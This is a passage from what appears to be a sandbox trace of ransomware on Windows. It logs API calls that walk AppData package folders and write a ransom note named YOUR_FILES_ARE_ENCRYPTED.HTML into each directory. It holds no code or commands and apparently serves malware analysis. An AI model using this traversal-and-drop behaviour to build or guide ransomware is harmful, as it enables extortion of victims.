lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.365] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 115 [0119.365] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.365] lstrlenW (lpString=".LOG2") returned 5 [0119.365] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.365] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6d738e58, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6d738e58, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6d738e58, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0119.365] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.365] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0119.365] GetProcessHeap () returned 0x600000 [0119.365] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.365] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.366] CloseHandle (hObject=0x214) returned 1 [0119.366] GetProcessHeap () returned 0x600000 [0119.366] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.366] GetProcessHeap () returned 0x600000 [0119.366] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.367] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605b6c25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605b6c25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x605b6c25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0119.367] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.367] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData") returned 102 [0119.367] GetProcessHeap () returned 0x600000 [0119.367] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.368] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData" [0119.368] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\*" [0119.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605b6c25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605b6c25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x605b6c25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.368] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605b6c25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605b6c25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x605b6c25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 1 [0119.368] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x605b6c25, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x605b6c25, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x605b6c25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 0 [0119.368] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.368] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0119.369] GetProcessHeap () returned 0x600000 [0119.369] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.370] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.370] CloseHandle (hObject=0x214) returned 1 [0119.370] GetProcessHeap () returned 0x600000 [0119.371] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.371] GetProcessHeap () returned 0x600000 [0119.371] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.371] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6056a7b2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6056a7b2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0119.371] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.371] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState") returned 98 [0119.371] GetProcessHeap () returned 0x600000 [0119.371] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.371] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState" [0119.371] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\*" [0119.371] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6056a7b2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6056a7b2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.371] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6056a7b2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6056a7b2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 1 [0119.371] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6056a7b2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6056a7b2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="..", cAlternateFileName="")) returned 0 [0119.371] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.371] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0119.371] GetProcessHeap () returned 0x600000 [0119.371] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.372] WriteFile (in: hFile=0x214, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.372] CloseHandle (hObject=0x214) returned 1 [0119.373] GetProcessHeap () returned 0x600000 [0119.373] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.373] GetProcessHeap () returned 0x600000 [0119.373] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.373] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6056a7b2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6056a7b2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6056a7b2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0119.373] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.373] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0119.373] GetProcessHeap () returned 0x600000 [0119.373] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0119.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.373] WriteFile (in: hFile=0x31c, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0119.374] CloseHandle (hObject=0x31c) returned 1 [0119.374] GetProcessHeap () returned 0x600000 [0119.374] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.374] GetProcessHeap () returned 0x600000 [0119.374] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0119.375] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", cAlternateFileName="MICROS~1.PAR")) returned 1 [0119.375] StrStrIW (lpFirst="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.375] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy") returned 97 [0119.375] GetProcessHeap () returned 0x600000 [0119.375] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0119.376] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy" [0119.376] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\*" [0119.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9420a0c8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.378] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9420a0c8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0119.378] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0119.378] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.378] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC") returned 100 [0119.378] GetProcessHeap () returned 0x600000 [0119.378] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.379] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC" [0119.379] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\*" [0119.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.380] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd6b4d3, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 1 [0119.380] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0119.380] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.380] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache") returned 110 [0119.380] GetProcessHeap () returned 0x600000 [0119.380] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.381] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache" [0119.381] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\*" [0119.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0119.382] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x30f3dc8, cFileName="..", cAlternateFileName="")) returned 1 [0119.382] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8bd4522e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd4522e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd4522e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, 